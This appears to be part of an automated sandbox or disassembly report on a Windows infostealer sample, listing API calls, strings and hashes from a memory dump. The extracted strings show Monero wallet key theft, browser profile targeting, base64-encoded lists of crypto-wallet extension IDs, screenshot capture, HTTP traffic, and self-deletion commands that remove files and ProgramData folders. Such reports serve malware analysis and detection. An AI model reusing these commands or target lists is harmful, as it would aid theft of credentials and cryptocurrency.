                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • " & rd /s /q "C:\ProgramData\, xrefs: 00038333
                                                                                                                                                                                          • /c timeout /t 10 & del /f /q ", xrefs: 000382E5
                                                                                                                                                                                          • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00038390
                                                                                                                                                                                          • " & exit, xrefs: 00038389
                                                                                                                                                                                          • " & exit, xrefs: 000383DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                          • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                          • API String ID: 2823247455-1079830800
                                                                                                                                                                                          • Opcode ID: 2b4c6f86b69c23e6c721a2d42a11241b1ae01369aab2042883adb539aed592ea
                                                                                                                                                                                          • Instruction ID: 8cfd75989eb6bff0457cc6cd3dba589962c2b7fabe239caebe77118961afaaa5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b4c6f86b69c23e6c721a2d42a11241b1ae01369aab2042883adb539aed592ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9651A9B1D402299BCF62EF64DC92ADDB3BCAB44704F8101E5AB18B7152DB306F868F54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000309D5
                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00030A15
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00030A6A
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00030A71
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00030AA7
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00056E3C), ref: 00030AB6
                                                                                                                                                                                            • Part of subcall function 00031684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0003169F
                                                                                                                                                                                            • Part of subcall function 00031684: _memset.LIBCMT ref: 000316CE
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000316F6
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00056ECC,?,?,?,?,?), ref: 00031713
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00030ACD
                                                                                                                                                                                            • Part of subcall function 000323D5: malloc.MSVCRT ref: 000323DA
                                                                                                                                                                                            • Part of subcall function 000323D5: strncpy.MSVCRT ref: 000323EB
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 00030AF0
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                          • String ID: :\$C$QuBi
                                                                                                                                                                                          • API String ID: 1856320939-239756005
                                                                                                                                                                                          • Opcode ID: a26fd4bf825ea03458eb7fda25d0809f948c1041f177575ae9d629e8ed6e2ca8
                                                                                                                                                                                          • Instruction ID: 9b78ba4f4addcd4ad0cec0a808a13a718db90e26c841ca622c88fc905fb42c08
                                                                                                                                                                                          • Opcode Fuzzy Hash: a26fd4bf825ea03458eb7fda25d0809f948c1041f177575ae9d629e8ed6e2ca8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B419FB190022CABCB259F78AC4AADEBABCEF1D304F0100E5F549E7121D6708F958F61
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00031F96
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00031FA4
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00031FB1
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00031FDE
                                                                                                                                                                                          • GetHGlobalFromStream.COMBASE(?,?), ref: 00032049
                                                                                                                                                                                          • GlobalLock.KERNEL32(?), ref: 00032052
                                                                                                                                                                                          • GlobalSize.KERNEL32(?), ref: 0003205E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00025482: lstrlenA.KERNEL32(?), ref: 00025519
                                                                                                                                                                                            • Part of subcall function 00025482: StrCmpCA.SHLWAPI(?,00056986,0005697B,0005697A,0005696F), ref: 00025588
                                                                                                                                                                                            • Part of subcall function 00025482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000255AA
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 000320BC
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 000320D7
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 000320E0
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 000320E8
                                                                                                                                                                                          • CloseWindow.USER32(00000000), ref: 000320EF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1802806997-0
                                                                                                                                                                                          • Opcode ID: 74a49de70e7d9af437af0706947cca41ed745e04db42ddab927e936c51571e05
                                                                                                                                                                                          • Instruction ID: 9b24e3b476b0cea51f3f218b1ffbabb413038d1947f97115fd72709833556dc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74a49de70e7d9af437af0706947cca41ed745e04db42ddab927e936c51571e05
                                                                                                                                                                                          • Instruction Fuzzy Hash: E851C272800118AFDF11AFA0ED4D9EEBFB9EF0C318B154465F909E2121EB309995DBA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00026963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000269C5
                                                                                                                                                                                            • Part of subcall function 00026963: StrCmpCA.SHLWAPI(?), ref: 000269DF
                                                                                                                                                                                            • Part of subcall function 00026963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026A0E
                                                                                                                                                                                            • Part of subcall function 00026963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00026A4D
                                                                                                                                                                                            • Part of subcall function 00026963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026A7D
                                                                                                                                                                                            • Part of subcall function 00026963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026A88
                                                                                                                                                                                            • Part of subcall function 00026963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00026AAC
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0003691A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00036925
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?), ref: 0003693A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00036949
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00036962
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                          • API String ID: 4174444224-1526165396
                                                                                                                                                                                          • Opcode ID: 19d66792a3971675daf1f945ae2e8aa3475de6ba810b73987c9bb48fd0a3497f
                                                                                                                                                                                          • Instruction ID: e651d7a46dc8f02214b9dbd15b9121c7e3047e76534e77a2f967038e17d975a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19d66792a3971675daf1f945ae2e8aa3475de6ba810b73987c9bb48fd0a3497f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C21BE31910114BBCF22BB74EC4A9EE7BBCAF15311F508266FD09E7153DB3299898B91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002EAF9
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002EB56
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0002EE1D
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002EC33
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002ECE3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0094C481), ref: 0002ED40
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy
                                                                                                                                                                                          • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                          • API String ID: 3722407311-2697854757
                                                                                                                                                                                          • Opcode ID: 10489bba2e70a4ea80515a53d9587f91396f5c9e05483bb18093639f2271bb95
                                                                                                                                                                                          • Instruction ID: 50c38e847517c4da970e6c7e612f9d5eff57b164922985fd2fbb58cdaeb0de3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10489bba2e70a4ea80515a53d9587f91396f5c9e05483bb18093639f2271bb95
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B15932D00519AFDF20FFA8ED47BCEB7B5AF44314F554150FD08AB252DA30AA598B92
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00021ADC
                                                                                                                                                                                            • Part of subcall function 00021A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00021A65
                                                                                                                                                                                            • Part of subcall function 00021A51: HeapAlloc.KERNEL32(00000000), ref: 00021A6C
                                                                                                                                                                                            • Part of subcall function 00021A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00021AE9), ref: 00021A89
                                                                                                                                                                                            • Part of subcall function 00021A51: RegQueryValueExA.ADVAPI32(00021AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00021AA4
                                                                                                                                                                                            • Part of subcall function 00021A51: RegCloseKey.ADVAPI32(00021AE9), ref: 00021AAD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00021AF1
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00021AFE
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.keys), ref: 00021B19
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00021C2A
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00021C9D
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                          • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                          • API String ID: 615783205-3586502688
                                                                                                                                                                                          • Opcode ID: e3af02543d0cc9223b939ebf4317bdeaeb44c0352839480d8d27460ff52b3ddb
                                                                                                                                                                                          • Instruction ID: 2752939033ed6a123a101a1e5a524689d760c4df5388b58626f07208cfb2fc1f
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3af02543d0cc9223b939ebf4317bdeaeb44c0352839480d8d27460ff52b3ddb
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC510B71E5112EABCF22EB64EC46ADD7378AF04304F5145E1BA08B7153DA30AF898F95
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 000210AA
                                                                                                                                                                                          • _memset.LIBCMT ref: 000210D0
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 000210E6
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,000384CC), ref: 00021100
                                                                                                                                                                                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00021107
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00021112
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • MHxLZWVQYXNzIFR1c2t8MHxmbWhtaWFlam9wZXBhbWxjamtuY3BncGRqaWNobmVjbXwxfDB8MHxLZWVQYXNzWEMtQnJvd3NlcnwwfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfFJpc2UgLSBBcHRvcyBXYWxsZXR8MXxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9w, xrefs: 000210C8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                          • String ID: MHxLZWVQYXNzIFR1c2t8MHxmbWhtaWFlam9wZXBhbWxjamtuY3BncGRqaWNobmVjbXwxfDB8MHxLZWVQYXNzWEMtQnJvd3NlcnwwfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfFJpc2UgLSBBcHRvcyBXYWxsZXR8MXxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9w
                                                                                                                                                                                          • API String ID: 1859398019-3373799983
                                                                                                                                                                                          • Opcode ID: 51445f728642deab7012b419f8653832951e9cb3352ac54289d2c290d64a0c77
                                                                                                                                                                                          • Instruction ID: c4171b740ea38b9c8044bff14f766ee19e8c318659a39e41f864c39cf384fcd3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51445f728642deab7012b419f8653832951e9cb3352ac54289d2c290d64a0c77
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF0C27238132077F36022752C9EFEF2A9C9B51F66F205420F708EB2C1D6A9990496B8
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00031607
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00031626
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0003164B
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00031657
                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 0003166B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                          • API String ID: 2235053359-1211650757
                                                                                                                                                                                          • Opcode ID: 59fa7f231259349891974a52299e620dd2f8452d3187bd12bc34849c2a41877b
                                                                                                                                                                                          • Instruction ID: 30ba8680ca4273916000abdbd6a0743c727c6a62bf0a930ced797bd61a041c35
                                                                                                                                                                                          • Opcode Fuzzy Hash: 59fa7f231259349891974a52299e620dd2f8452d3187bd12bc34849c2a41877b
                                                                                                                                                                                          • Instruction Fuzzy Hash: A11112B550121DAFEB10DB90DC89FEAB7BCEB08305F4001E5A619E6052D674AE888F20
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00021A65
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00021A6C
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00021AE9), ref: 00021A89
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00021AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00021AA4
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00021AE9), ref: 00021AAD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SOFTWARE\monero-project\monero-core, xrefs: 00021A7F
                                                                                                                                                                                          • wallet_path, xrefs: 00021A9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                          • API String ID: 3466090806-4244082812
                                                                                                                                                                                          • Opcode ID: 55cc482dd57d51340082a2dfd436c8a4cdbc127564c2fc47fb10f8d62fa8a9cc
                                                                                                                                                                                          • Instruction ID: 1d62fb5d9438e2a52a77827211ad54144624bc7d3bdbdde40e0e6f12a0136c5d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55cc482dd57d51340082a2dfd436c8a4cdbc127564c2fc47fb10f8d62fa8a9cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F05E75740308BFFB105B90EC0FFAA7B78EB48B09F1501A4BB05A9090E6B0AA809670
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00035E86
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00035EA3
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035EC2
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035ED6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035EE9
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035EFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035F10
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 00035B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00035B30
                                                                                                                                                                                            • Part of subcall function 00035B0B: HeapAlloc.KERNEL32(00000000), ref: 00035B37
                                                                                                                                                                                            • Part of subcall function 00035B0B: wsprintfA.USER32 ref: 00035B50
                                                                                                                                                                                            • Part of subcall function 00035B0B: FindFirstFileA.KERNEL32(?,?), ref: 00035B67
                                                                                                                                                                                            • Part of subcall function 00035B0B: StrCmpCA.SHLWAPI(?,00056A98), ref: 00035B88
                                                                                                                                                                                            • Part of subcall function 00035B0B: StrCmpCA.SHLWAPI(?,00056A9C), ref: 00035BA2
                                                                                                                                                                                            • Part of subcall function 00035B0B: wsprintfA.USER32 ref: 00035BC9
                                                                                                                                                                                            • Part of subcall function 00035B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00035C86
                                                                                                                                                                                            • Part of subcall function 00035B0B: DeleteFileA.KERNEL32(?), ref: 00035CA9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1546541418-0
                                                                                                                                                                                          • Opcode ID: 42dead1c7ed5dc87e9c571dbf8814a6a46b6659cc48016d44e4ef080c641ce4d
                                                                                                                                                                                          • Instruction ID: eb683353785370c636831aba910d20c6d0d69b5d8808871efd5f6d1b7e6bda6a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42dead1c7ed5dc87e9c571dbf8814a6a46b6659cc48016d44e4ef080c641ce4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5051DAB5A0011C9BCF55DB64DC89ADDB7B9AB4C310F8144E6FA09E3251EA30ABC98F54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0003CBEE,?,0003CC7C,00000000,06400000,00000003,00000000,0003757F,.exe,00056C5C), ref: 0003BC6E
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0003CBEE,?,0003CC7C,00000000,06400000,00000003,00000000), ref: 0003BCA6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • uY3Bla2toY2xtaW5ncGltam1jb29pZmJ8MXwwfDB8SEFWQUggV2FsbGV0fDF8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8MXxvY2pkcG1vYWxsbWdtamJib2dmaWlhb2ZwaGJqZ2NoaHwxfDB8MHxWZW5vbSBXYWxsZXR8MXxvamdnbWNobGdobmpsYXBtZmJuamhvbGZqa2lpZGJjaHwxfDB, xrefs: 0003BD0E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreatePointer
                                                                                                                                                                                          • String ID: uY3Bla2toY2xtaW5ncGltam1jb29pZmJ8MXwwfDB8SEFWQUggV2FsbGV0fDF8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8MXxvY2pkcG1vYWxsbWdtamJib2dmaWlhb2ZwaGJqZ2NoaHwxfDB8MHxWZW5vbSBXYWxsZXR8MXxvamdnbWNobGdobmpsYXBtZmJuamhvbGZqa2lpZGJjaHwxfDB
                                                                                                                                                                                          • API String ID: 2024441833-3993475178
                                                                                                                                                                                          • Opcode ID: 42c1c2034973d6f9e466f964bc2791058a5b16533408b0fe1699e538048ec659
                                                                                                                                                                                          • Instruction ID: 22a4f56d0ab6939856c65c8678f0b55eff266a62db59b8579b49e7db7f91b56d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42c1c2034973d6f9e466f964bc2791058a5b16533408b0fe1699e538048ec659
                                                                                                                                                                                          • Instruction Fuzzy Hash: 743196F4504745DFDB729F2588D4B27BAECBB1535DF108E2EE29B86581E3349884CB12
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B44
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B4B
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B79
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00056888,00000000,00000000,00000000,000000FF,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B95
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00056888,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B9E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID: Windows 11
                                                                                                                                                                                          • API String ID: 3466090806-2517555085
